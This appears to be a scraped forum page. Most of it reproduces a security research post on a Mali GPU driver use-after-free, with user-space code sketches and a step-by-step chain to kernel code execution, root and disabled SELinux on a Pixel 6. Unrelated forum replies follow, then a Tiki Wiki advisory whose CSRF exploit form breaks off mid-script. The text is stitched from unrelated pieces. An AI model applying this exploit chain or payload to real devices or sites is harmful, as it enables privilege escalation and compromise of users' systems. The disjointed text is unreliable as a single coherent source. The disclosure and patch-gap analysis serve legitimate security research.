If a suitable region is found, then it’ll be moved to jit_active_head, indicating that it is now in use in userland. Otherwise, a memory region will be created and added to the jit_active_head instead. The region allocated by kbase_jit_allocate, whether it is newly created or reused from jit_pool_head, is then stored in the jit_alloc array of the kbase_context by kbase_jit_allocate_process. When the user no longer needs the JIT memory, it can send a BASE_JD_REQ_SOFT_JIT_FREE job to the GPU. This then uses kbase_jit_free to free the memory. However, rather than returning the backing pages of the memory region back to the kernel immediately, kbase_jit_free first reduces the backing region to a minimal size and removes any CPU side mapping, so the pages in the region are no longer reachable from the address space of the user process:

    void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
    {
        ...
        //First reduce the size of the backing region and unmap the freed pages
        old_pages = kbase_reg_current_backed_size(reg);
        if (reg->initial_commit < old_pages) {
            u64 new_size = MAX(reg->initial_commit,
                    div_u64(old_pages * (100 - kctx->trim_level), 100));
            u64 delta = old_pages - new_size;
            //Free delta pages in the region and reduces its size to old_pages - delta
            if (delta) {
                mutex_lock(&kctx->reg_lock);
                kbase_mem_shrink(kctx, reg, old_pages - delta);
                mutex_unlock(&kctx->reg_lock);
            }
        }
        ...
        //Remove the pages from address space of user process
        kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);

Note that the backing pages of the region (reg) are not completely removed at this stage, and reg is also not going to be freed here. Instead, reg is moved back into jit_pool_head. However, perhaps more interestingly, reg is also moved to the evict_list of the kbase_context:

        kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);
        ...
        mutex_lock(&kctx->jit_evict_lock);
        /* This allocation can't already be on a list. */
        WARN_ON(!list_empty(&reg->gpu_alloc->evict_node));
        //Add reg to evict_list
        list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list);
        atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents);
        //Move reg to jit_pool_head
        list_move(&reg->jit_node, &kctx->jit_pool_head);

After kbase_jit_free completed, its caller, kbase_jit_free_finish, will also clean up the reference stored in jit_alloc when the region was allocated, even though reg is still valid at this stage:

    static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
    {
        ...
        for (j = 0; j != katom->nr_extres; ++j) {
            if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
                ...
                if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) {
                    ...
                    kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]);
                }
                kctx->jit_alloc[ids[j]] = NULL; //<--------- clean up reference
            }
        }
        ...
    }

As we’ve seen before, the memory region in the jit_pool_head list may now be reused when the user allocates another JIT region. So this explains jit_pool_head and jit_active_head. What about jit_destroy_head? When JIT memory is freed by calling kbase_jit_free, it is also put on the evict_list. Memory regions in the evict_list are regions that can be freed when memory pressure arises. By putting a JIT region that is no longer in use in the evict_list, the Mali driver can hold onto unused JIT memory for quick reallocation, while returning them to the kernel when the resources are needed. The Linux kernel provides a mechanism to reclaim unused cached memory, called shrinkers.
The Linux kernel provides a mechanism, called shrinkers, for reclaiming unused cached memory. Kernel components, such as drivers, can define a shrinker object, which, amongst other things, involves defining the count_objects and scan_objects methods:

struct shrinker {
	unsigned long (*count_objects)(struct shrinker *,
				       struct shrink_control *sc);
	unsigned long (*scan_objects)(struct shrinker *,
				      struct shrink_control *sc);
	...
};

The custom shrinker can then be registered via the register_shrinker method. When the kernel is under memory pressure, it’ll go through the list of registered shrinkers, use their count_objects method to determine the potential amount of memory that can be freed, and then use scan_objects to free the memory. In the case of the Mali GPU driver, the shrinker is defined and registered in the kbase_mem_evictable_init method:

int kbase_mem_evictable_init(struct kbase_context *kctx)
{
	...
	//kctx->reclaim is a shrinker
	kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects;
	kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects;
	...
	register_shrinker(&kctx->reclaim);
	return 0;
}

The more interesting of these methods is kbase_mem_evictable_reclaim_scan_objects, which is responsible for freeing the memory needed by the kernel:

static unsigned long kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s,
		struct shrink_control *sc)
{
	...
	list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) {
		int err;

		err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg, 0, alloc->nents);
		...
		kbase_free_phy_pages_helper(alloc, alloc->evicted);
		...
		list_del_init(&alloc->evict_node);
		...
		kbase_jit_backing_lost(alloc->reg);  //<------- moves `reg` to `jit_destroy_head`
	}
	...
}

This is called to remove cached memory in jit_pool_head and return it to the kernel. The function kbase_mem_evictable_reclaim_scan_objects goes through the evict_list, unmaps the backing pages from the GPU (recall that the CPU mapping was already removed in kbase_jit_free) and then frees the backing pages. It then calls kbase_jit_backing_lost to move reg from jit_pool_head to jit_destroy_head:

void kbase_jit_backing_lost(struct kbase_va_region *reg)
{
	...
	list_move(&reg->jit_node, &kctx->jit_destroy_head);
	schedule_work(&kctx->jit_work);
}

The memory region in jit_destroy_head is then picked up by kbase_jit_destroy_worker, which frees the kbase_va_region in jit_destroy_head and removes references to the kbase_va_region entirely. Well, not entirely… one small pointer still holds out against the clean up logic. And lifetime management is not easy for the pointers in the fortified camps of the Arm Mali regime.

The clean up logic in kbase_mem_evictable_reclaim_scan_objects is not responsible for removing the reference in jit_alloc that was stored when the JIT memory was allocated. Normally, this is not a problem: as we’ve seen before, that reference is cleared when kbase_jit_free_finish is called to put the region on the evict_list, and a JIT region is normally only moved to the evict_list when the user frees it via a BASE_JD_REQ_SOFT_JIT_FREE job, which removes the reference stored in jit_alloc. But we don’t do normal things here, nor do the people who seek to compromise devices.
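Outside of the Mali driver, the generic shrinker interface described above can be illustrated with a minimal, self-contained kernel-module sketch of my own (not the driver's code). It uses the pre-6.0 register_shrinker() signature, matching the driver code quoted above, and demo_cached stands in for whatever cache a real module would manage:

/* Minimal shrinker sketch: a fake "cache" of 100 reclaimable objects. */
#include <linux/module.h>
#include <linux/shrinker.h>
#include <linux/atomic.h>

static atomic_long_t demo_cached = ATOMIC_LONG_INIT(100);

static unsigned long demo_count_objects(struct shrinker *s, struct shrink_control *sc)
{
	/* Report how many objects could be freed; 0 means "nothing to do". */
	return atomic_long_read(&demo_cached);
}

static unsigned long demo_scan_objects(struct shrinker *s, struct shrink_control *sc)
{
	/* Free up to sc->nr_to_scan objects and report how many were freed. */
	unsigned long avail = atomic_long_read(&demo_cached);
	unsigned long freed = sc->nr_to_scan < avail ? sc->nr_to_scan : avail;

	atomic_long_sub(freed, &demo_cached);
	return freed ? freed : SHRINK_STOP;  /* SHRINK_STOP: stop scanning this shrinker */
}

static struct shrinker demo_shrinker = {
	.count_objects = demo_count_objects,
	.scan_objects = demo_scan_objects,
	.seeks = DEFAULT_SEEKS,
};

static int __init demo_init(void)
{
	return register_shrinker(&demo_shrinker);
}

static void __exit demo_exit(void)
{
	unregister_shrinker(&demo_shrinker);
}

module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");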
The vulnerability

While the semantics of memory eviction are closely tied to JIT memory, with most eviction functionality referencing “JIT” (for example, the use of kbase_jit_backing_lost in kbase_mem_evictable_reclaim_scan_objects), evictable memory is more general, and other types of GPU memory can also be added to the evict_list and made evictable. This can be achieved by calling kbase_mem_evictable_make to add memory regions to the evict_list and kbase_mem_evictable_unmake to remove memory regions from it. From userspace, these can be reached via the KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl. Depending on whether the BASE_MEM_DONT_NEED flag is passed (which maps to the kernel-side KBASE_REG_DONT_NEED region flag), a memory region can be added to or removed from the evict_list:

int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr,
		unsigned int flags, unsigned int mask)
{
	...
	prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
	new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;
	if (prev_needed != new_needed) {
		...
		if (new_needed) {
			...
			ret = kbase_mem_evictable_make(reg->gpu_alloc);  //<------ Add to `evict_list`
			if (ret)
				goto out_unlock;
		} else {
			kbase_mem_evictable_unmake(reg->gpu_alloc);      //<------- Remove from `evict_list`
		}
	}

By putting a JIT memory region directly on the evict_list and then creating memory pressure to trigger kbase_mem_evictable_reclaim_scan_objects, the JIT region will be freed while a pointer to it is still stored in jit_alloc. After that, a BASE_JD_REQ_SOFT_JIT_FREE job can be submitted to make kbase_jit_free_finish use the freed object pointed to by jit_alloc:

static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
	...
	for (j = 0; j != katom->nr_extres; ++j) {
		if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
			...
			if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) {
				...
				kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]);  //<----- Use of the now freed jit_alloc[ids[j]]
			}
			kctx->jit_alloc[ids[j]] = NULL;
		}
	}

Amongst other things, kbase_jit_free will first free some of the backing pages of the now freed kctx->jit_alloc[ids[j]]:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
	...
	old_pages = kbase_reg_current_backed_size(reg);
	if (reg->initial_commit < old_pages) {
		...
		u64 delta = old_pages - new_size;

		if (delta) {
			mutex_lock(&kctx->reg_lock);
			kbase_mem_shrink(kctx, reg, old_pages - delta);  //<----- Free some pages in the region
			mutex_unlock(&kctx->reg_lock);
		}
	}

So by replacing the freed JIT region with a fake object, I can potentially free arbitrary pages, which is a very powerful primitive.
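The first step of that trigger, marking the JIT region as evictable, looks roughly like this from user space. This is a hypothetical sketch: the struct and the BASE_MEM_DONT_NEED constant are assumed to come from the Mali UAPI headers, and jit_gpu_va stands for the GPU address of the targeted JIT region:

/* Hypothetical sketch: put a region on the evict_list from user space. */
#include <sys/ioctl.h>
#include "mali_kbase_ioctl.h"  /* assumed */

static int make_evictable(int mali_fd, __u64 jit_gpu_va)
{
	struct kbase_ioctl_mem_flags_change change = {
		.gpu_va = jit_gpu_va,
		.flags  = BASE_MEM_DONT_NEED,  /* request: add the region to the evict_list */
		.mask   = BASE_MEM_DONT_NEED,
	};
	return ioctl(mali_fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
}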
Exploiting the bug

As explained before, this bug is triggered when the kernel is under memory pressure and calls kbase_mem_evictable_reclaim_scan_objects via the shrinker mechanism. From a user process, the required memory pressure can be created as simply as mapping a large amount of memory using the mmap system call. However, the exact amount of memory required to trigger the shrinker scanning is uncertain, meaning that there is no guarantee that a shrinker scan will be triggered after any given allocation. While I could try to allocate an excessive amount of memory to ensure that shrinker scanning is triggered, doing so risks causing an out-of-memory crash and may also make the object replacement unreliable. This makes it difficult to trigger and exploit the bug reliably. It would be better if I could allocate memory incrementally, check after each allocation step whether the JIT region has been freed by kbase_mem_evictable_reclaim_scan_objects, and only proceed with the exploit once I’m sure that the bug has been triggered.

The Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY, for querying properties of memory regions at a specific GPU address. If the address is invalid, the ioctl will fail and return an error. This allows me to check whether the JIT region is freed, because when kbase_mem_evictable_reclaim_scan_objects is called to free the JIT region, it’ll first remove the region’s GPU mappings, making its GPU address invalid. By using the KBASE_IOCTL_MEM_QUERY ioctl to query the GPU address of the JIT region after each allocation, I can therefore check whether the region has been freed by kbase_mem_evictable_reclaim_scan_objects, and only start spraying the heap to replace the JIT region when it has actually been freed. Moreover, the KBASE_IOCTL_MEM_QUERY ioctl doesn’t involve memory allocation, so it won’t interfere with the object replacement. This makes it perfect for testing whether the bug has been triggered.

Although the shrinker is a kernel mechanism for freeing up evictable memory, the scanning and removal of evictable objects via shrinkers is actually performed by the process that is requesting the memory. So, for example, if my process is mapping some memory into its address space (via mmap and then faulting the pages), and the amount of memory that I am mapping creates sufficient memory pressure that a shrinker scan is triggered, then the shrinker scan and the removal of the evictable objects will be done in the context of my process. This, in particular, means that if I pin my process to a CPU while the shrinker scan is triggered, the JIT region that is removed during the scan will be freed on the same CPU. (Strictly speaking, this is not a hundred percent correct, because the JIT region is actually scheduled to be freed on a worker, but most of the time the worker is indeed executed immediately on the same CPU.) This helps me replace the freed JIT region reliably, because when objects are freed in the kernel, they are placed in a per-CPU cache, and subsequent object allocations on the same CPU will first be served from that CPU cache. This means that, by allocating another object of similar size on the same CPU, I’m likely to be able to replace the freed JIT region. Moreover, the JIT region, which is a kbase_va_region, is a rather large object that is allocated in the kmalloc-256 cache (which serves kmalloc allocations larger than 128 bytes and up to 256 bytes) instead of the kmalloc-128 cache (which serves allocations of up to 128 bytes), and kmalloc-256 is a less heavily used cache. This, together with the relative certainty of the CPU that frees the JIT region, allows me to reliably replace the JIT region after it is freed.
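Putting these observations together, the "pin, pressure, probe" loop can be sketched as follows. This is a hypothetical sketch: the KBASE_IOCTL_MEM_QUERY union and KBASE_MEM_QUERY_COMMIT_SIZE are assumed to come from the Mali UAPI headers, and CHUNK is an arbitrary pressure step:

/* Hypothetical sketch of incrementally applying memory pressure and probing
 * the JIT region's GPU address after each step. */
#define _GNU_SOURCE
#include <sched.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include "mali_kbase_ioctl.h"  /* assumed */

#define CHUNK (16UL << 20)  /* 16 MiB of extra pressure per step: an arbitrary choice */

static int jit_region_freed(int mali_fd, __u64 jit_gpu_va)
{
	union kbase_ioctl_mem_query q = { .in = { .gpu_addr = jit_gpu_va,
						  .query = KBASE_MEM_QUERY_COMMIT_SIZE } };
	/* Fails once the region's GPU mapping (and thus its GPU address) is gone. */
	return ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &q) < 0;
}

static void pressure_until_freed(int mali_fd, __u64 jit_gpu_va)
{
	cpu_set_t set;

	/* Pin to one CPU so the region is freed to this CPU's per-CPU cache. */
	CPU_ZERO(&set);
	CPU_SET(0, &set);
	sched_setaffinity(0, sizeof(set), &set);

	while (!jit_region_freed(mali_fd, jit_gpu_va)) {
		char *p = mmap(NULL, CHUNK, PROT_READ | PROT_WRITE,
			       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
		if (p == MAP_FAILED)
			break;
		memset(p, 1, CHUNK);  /* fault the pages in to create real pressure */
	}
	/* Next: spray kmalloc-256-sized objects on this CPU to reclaim the slot. */
}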
Replacing the freed object

Now that I can reliably replace the freed JIT region, I can look at how to exploit the bug. As explained before, the freed JIT region can be used as the reg argument of kbase_jit_free, potentially allowing arbitrary pages to be freed:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
	...
	old_pages = kbase_reg_current_backed_size(reg);
	if (reg->initial_commit < old_pages) {
		...
		u64 delta = old_pages - new_size;

		if (delta) {
			mutex_lock(&kctx->reg_lock);
			kbase_mem_shrink(kctx, reg, old_pages - delta);  //<----- Free some pages in the region
			mutex_unlock(&kctx->reg_lock);
		}
	}

One possibility is to use the well-known heap spraying technique to replace the freed JIT region with arbitrary data using sendmsg. This would enable me to create a fake kbase_va_region with a fake gpu_alloc and fake pages that could be used to free arbitrary pages in kbase_mem_shrink:

int kbase_mem_shrink(struct kbase_context *const kctx,
		struct kbase_va_region *const reg, u64 new_pages)
{
	...
	err = kbase_mem_shrink_gpu_mapping(kctx, reg, new_pages, old_pages);
	if (err >= 0) {
		/* Update all CPU mapping(s) */
		kbase_mem_shrink_cpu_mapping(kctx, reg, new_pages, old_pages);

		kbase_free_phy_pages_helper(reg->cpu_alloc, delta);          //<------- free pages in cpu_alloc
		if (reg->cpu_alloc != reg->gpu_alloc)
			kbase_free_phy_pages_helper(reg->gpu_alloc, delta);  //<--- free pages in gpu_alloc

In order to do so, I’d need to know the addresses of some data that I can control, so I could place a fake gpu_alloc and its pages field at those addresses. This could be done either by finding a way to leak addresses of kernel objects, or by using techniques like the one I wrote about in the section “The ultimate fake object store” in my other post. But why use a fake object when you can use a real one?

The JIT region involved in the use-after-free bug here is a kbase_va_region, which is a complex object with multiple states, and many operations can only be performed on memory objects in the correct state. In particular, kbase_mem_shrink should only be used on a kbase_va_region that has not been mapped multiple times. The Mali driver provides the KBASE_IOCTL_MEM_ALIAS ioctl, which allows multiple memory regions to share the same backing pages. I’ve written about how KBASE_IOCTL_MEM_ALIAS works in more detail in my previous post, but for the purpose of this exploit, the crucial point is that KBASE_IOCTL_MEM_ALIAS can be used to create memory regions in the GPU and user address spaces that are aliased to a kbase_va_region, meaning that they are backed by the same physical pages. If a kbase_va_region reg is mapped multiple times using KBASE_IOCTL_MEM_ALIAS and then has its backing pages freed by kbase_mem_shrink, only the memory mappings of reg itself are removed, so the alias regions created by KBASE_IOCTL_MEM_ALIAS can still be used to access the freed backing pages. To prevent kbase_mem_shrink from being called on aliased JIT memory, kbase_mem_alias checks for the KBASE_REG_NO_USER_FREE flag, so that JIT memory cannot be aliased:

u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
		    u64 nents, struct base_mem_aliasing_info *ai, u64 *num_pages)
{
	...
	for (i = 0; i < nents; i++) {
		if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) {
			if (ai[i].handle.basep.handle !=
			    BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE)
			...
		} else {
			...
			if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE)  //<-- 2.
				goto bad_handle; /* JIT regions can't be
						  * aliased. NO_USER_FREE flag
						  * covers the entire lifetime
						  * of JIT regions. The other
						  * types of regions covered
						  * by this flag also shall
						  * not be aliased.
						  ... */
		}
	}

Now suppose I trigger the bug and replace the freed JIT region with a normal memory region allocated via the KBASE_IOCTL_MEM_ALLOC ioctl: an object of the exact same type, but without the KBASE_REG_NO_USER_FREE flag that a JIT region carries. I then use KBASE_IOCTL_MEM_ALIAS to create an extra mapping for the backing store of this new region. All of this is valid, as I’m just aliasing a normal memory region that does not have the KBASE_REG_NO_USER_FREE flag. However, because of the bug, the dangling pointer in jit_alloc also points to this new region, which has now been aliased.
If I now submit a BASE_JD_REQ_SOFT_JIT_FREE job to call kbase_jit_free on this memory, kbase_mem_shrink will be called, and part of the backing store of this new region will be freed, but the extra mappings created in the alias region will not be removed, meaning that I can still access the freed backing pages from the alias region. By using a real object of the same type, not only do I save the effort needed to craft a fake object, but I also reduce the risk of side effects that could result in a crash.
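The replace-and-alias step described above might look roughly like this. This is a hypothetical sketch: the ioctl unions and BASE_MEM_* flags are assumed to come from the Mali UAPI headers, PAGES and the flag choices are illustrative, and the returned handles typically still need to be mmapped before use (error handling and mapping omitted). In practice one would also allocate many such regions, not just one, to reliably reclaim the freed slot:

/* Hypothetical sketch: allocate a normal region (to reclaim the freed
 * kbase_va_region slot) and alias its backing pages. */
#include <stdint.h>
#include <sys/ioctl.h>
#include "mali_kbase_ioctl.h"  /* assumed */

#define PAGES 16  /* illustrative region size, in 4K pages */

static int replace_and_alias(int mali_fd, __u64 *region_va, __u64 *alias_va)
{
	/* 1. A normal region: the same object type as a JIT region, but
	 *    without KBASE_REG_NO_USER_FREE, so aliasing it is allowed. */
	union kbase_ioctl_mem_alloc alloc = {
		.in = {
			.va_pages = PAGES,
			.commit_pages = PAGES,
			.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_CPU_WR |
				 BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_GPU_WR,
		},
	};
	if (ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &alloc) < 0)
		return -1;
	*region_va = alloc.out.gpu_va;

	/* 2. Alias its backing pages, so they stay reachable after the
	 *    UAF'd kbase_jit_free shrinks the region itself. */
	struct base_mem_aliasing_info ai = {
		.handle.basep.handle = alloc.out.gpu_va,
		.offset = 0,
		.length = PAGES,
	};
	union kbase_ioctl_mem_alias alias = {
		.in = {
			.flags = BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_GPU_WR,
			.stride = PAGES,
			.nents = 1,
			.aliasing_info = (__u64)(uintptr_t)&ai,
		},
	};
	if (ioctl(mali_fd, KBASE_IOCTL_MEM_ALIAS, &alias) < 0)
		return -1;
	*alias_va = alias.out.gpu_va;
	return 0;
}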
The situation is now very similar to what I had in my previous post, and the exploit flow from this point on is also very similar. For completeness, I’ll give an overview of how the exploit works here, but interested readers can find more details from the section “Breaking out of the context” onwards in that post.

To recap: I now have access to the backing pages of a kbase_va_region object that has already been freed, and I’d like to reuse these freed backing pages to gain read and write access to arbitrary memory. To understand how this can be done, we need to know how the backing pages of a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:

int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
		struct tagged_addr *pages, bool partial_allowed)
{
	...
	/* Get pages from this pool */
	while (nr_from_pool--) {
		p = kbase_mem_pool_remove_locked(pool);              //<------- 1.
		...
	}
	...
	if (i != nr_4k_pages && pool->next_pool) {
		/* Allocate via next pool */
		err = kbase_mem_pool_alloc_pages(pool->next_pool,    //<----- 2.
				nr_4k_pages - i, pages + i, partial_allowed);
		...
	} else {
		/* Get any remaining pages from kernel */
		while (i != nr_4k_pages) {
			p = kbase_mem_alloc_page(pool);              //<------- 3.
			...
		}
		...
	}
	...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First, the pages are allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, the opposite happens: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context. If that memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, the remaining pages are returned to the kernel by freeing them via the buddy allocator.

As noted in my previous post, pool->next_pool is a memory pool managed by the Mali driver and shared by all kbase_context objects. It is also used for allocating the page table global directories (PGDs) of GPU contexts. In particular, this means that, by carefully arranging the memory pools, it is possible to cause a freed backing page of a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found in my previous post.)

As the bottom-level PGD stores the physical addresses of the backing pages of GPU virtual memory addresses, being able to write to a PGD allows me to map arbitrary physical pages into GPU memory, which I can then read from and write to by issuing GPU commands. This gives me access to arbitrary physical memory. As the physical addresses of kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite kernel code and gain arbitrary kernel code execution. (Figure from the original post: the green block indicates the same page being reused as the PGD.)

To summarize, the exploit involves the following steps:

1. Create JIT memory.
2. Mark the JIT memory as evictable.
3. Increase memory pressure by mapping memory into user space via normal mmap system calls.
4. Use the KBASE_IOCTL_MEM_QUERY ioctl to check whether the JIT memory has been freed. Carry on applying memory pressure until the JIT region is freed.
5. Allocate new GPU memory regions using the KBASE_IOCTL_MEM_ALLOC ioctl to replace the freed JIT memory.
6. Create an alias region to the new GPU memory region that replaced the JIT memory, so that the backing pages of the new GPU memory are shared with the alias region.
7. Submit a BASE_JD_REQ_SOFT_JIT_FREE job to free the JIT region. As the JIT region has now been replaced by the new memory region, this causes kbase_jit_free to remove the backing pages of the new memory region, but the GPU mappings created in the alias region in step 6 are not removed. The alias region can now be used to access the freed backing pages.
8. Reuse the freed backing pages as the PGD of the kbase_context. The alias region can now be used to rewrite the PGD, after which I can map arbitrary physical pages into the GPU address space.
9. Map kernel code into the GPU address space to gain arbitrary kernel code execution, which can then be used to rewrite the credentials of our process to gain root, and to disable SELinux.

The exploit for Pixel 6 can be found here with some setup notes.

Disclosure and patch gapping

At the start of the post, I mentioned that I initially reported this bug to the Android Security team, but it was later dismissed as a “Won’t fix” bug. While it is unclear to me why such a decision was made, it is perhaps worth taking a look at the wider picture instead of treating this as an isolated incident.

There has been a long history of N-day vulnerabilities being exploited in the Android kernel, many of which were fixed in the upstream kernel but never ported to Android. Perhaps the most infamous of these was CVE-2019-2215 (Bad Binder), which was initially discovered by the syzkaller fuzzer in November 2017 and patched in February 2018. However, this fix was never included in an Android monthly security bulletin until it was rediscovered as an exploited in-the-wild bug in September 2019. Another exploited in-the-wild bug, CVE-2021-1048, was introduced in the upstream kernel in December 2020 and fixed upstream a few weeks later. The patch, however, was not included in the Android Security Bulletin until November 2021, when the bug was discovered to be exploited in the wild. Yet another exploited in-the-wild vulnerability, CVE-2021-0920, was found in 2016, with details visible in a Linux kernel email thread. The report, however, was dismissed by kernel developers at the time, until the bug was rediscovered to be exploited in the wild and was patched in November 2021.
To be fair, these cases were patched or ignored upstream without being identified as security issues (CVE-2021-0920, for example, was simply ignored), making it difficult for any vendor to identify such issues before it’s too late. This again shows the importance of properly addressing security issues and recording them by assigning CVE IDs, so that downstream users can apply the relevant security patches. Unfortunately, vendors sometimes see security vulnerabilities in their products as damage to their reputation and try to silently patch or downplay security issues instead. The above examples show just how serious the consequences of such a mentality can be. While Android has made improvements to keep the kernel branches more unified and up to date, to avoid problems such as CVE-2019-2215, where the vulnerability was patched in some branches but not others, some recent disclosures highlight a rather worrying trend.

On March 7th, 2022, CVE-2022-0847 (Dirty Pipe) was disclosed publicly, with full details and a proof-of-concept exploit to overwrite read-only files. While the bug was patched upstream on February 23rd, 2022, with the patch merged into the Android kernel on February 24th, 2022, the patch was not included in the Android Security Bulletin until May 2022, and the public proof-of-concept exploit still ran successfully on a Pixel 6 with the April patch. While this may look like another incident where a security bug was silently patched upstream, this case was very different: according to the disclosure timeline, the bug report was shared with the Android Security Team on February 21st, 2022, a day after it was reported to the Linux kernel.

Another vulnerability, CVE-2021-39793 in the Mali driver, was patched by Arm in version r36p0 of the driver (as CVE-2022-22706), which was released on February 11th, 2022. The patch was only included in the Android Security Bulletin in March, as an exploited in-the-wild bug. Yet another vulnerability, CVE-2022-20186, which I reported to the Android Security Team on January 15th, 2022, was patched by Arm in version r37p0 of the Mali driver, released on April 21st, 2022. The patch was only included in the Android Security Bulletin in June, and a Pixel 6 running the May patch was still affected.

Taking a look at security issues reported by Google’s Project Zero team: between June and July 2022, Jann Horn of Project Zero reported five security issues (2325, 2327, 2331, 2333, 2334) in the Arm Mali GPU that affected Pixel phones. These issues were promptly fixed as CVE-2022-33917 and CVE-2022-36449 by the Arm security team, on July 25th, 2022 (CVE-2022-33917 in r39p0) and on August 18th, 2022 (CVE-2022-36449 in r38p1). The details of these bugs, including proofs of concept, were disclosed on September 18th, 2022. However, at least some of the issues remained unfixed in December 2022, even after Project Zero published a blog post on November 22nd, 2022 highlighting the patching problem with these particular issues (issue 2327, for example, was only fixed silently in the January 2023 patch, without any mention of the CVE ID).

In all of these instances, the bugs were only patched in Android a couple of months after a patch was publicly released upstream. In light of this, the response to this current bug is perhaps not too surprising. The year is 2023 A.D., and it’s still easy to pwn Android with N-days entirely. Well, yes, entirely.
Notes

Observant readers who learn their European history from a certain comic series may recognise the similarity between this and the openings of the Asterix series, which usually start with: “The year is 50 BC. Gaul is entirely occupied by the Romans. Well, not entirely… One small village of indomitable Gauls still holds out against the invaders. And life is not easy for the Roman legionaries who garrison the fortified camps of Totorum, Aquarium, Laudanum and Compendium…”

Source: https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/
    1 point
  34. I can only answer concrete questions, ones I can answer without breaching contractual terms, confidentiality, or common decency. That one is a personal opinion, so I can't really respond to it, but thank you for the feedback.
    1 point
  35. I haven't heard anything bad about them.
    1 point
  36. How do you ban users on the IPBoard platform?
    1 point
  37. Given that it's Zitec, I'd say yes; at least that's what they officially claim: https://blog.zitec.com/kickstarting-a-tech-career-internship-zitec
    1 point
  38. It's not a PBN; it contains all the sites in Romania, from stirileprotv and antena3 to kanald, ziare.com and so on. You can't call all the sites in a country a PBN; there are a few thousand of them.
    1 point
  39. Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php.

----------------------------------------------------------------------------------------------------
Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability
----------------------------------------------------------------------------------------------------

[-] Software Link: https://tiki.org

[-] Affected Versions: Version 24.1 and prior versions.

[-] Vulnerability Description:

The vulnerability is located in the /lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when importing data from WordPress sites through the Tiki Importer, user input passed through the uploaded XML file is being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires an admin account (specifically, the ‘tiki_p_admin_importer’ permission). However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following:

<html>
<form action="http://localhost/tiki/tiki-importer.php" method="POST" enctype="multipart/form-data">
   <input type="hidden" name="importerClassName" value="TikiImporter_Blog_Wordpress" />
   <input type="hidden" name="importAttachments" value="on" />
   <input type="file" name="importFile" id="fileinput"/>
</form>
<script>
